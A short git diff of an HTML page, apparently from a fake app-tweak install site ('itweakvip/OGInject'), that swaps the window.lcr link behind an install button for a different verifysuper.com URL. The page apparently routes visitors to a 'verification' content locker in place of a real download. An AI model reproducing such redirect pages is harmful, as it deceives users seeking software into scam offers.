--- a/itweakvip/OGInject/happy.html
+++ b/itweakvip/OGInject/happy.html
@@ -125,7 +125,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=0ae4376e2a6d8355349fb4f20bfb4b06";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
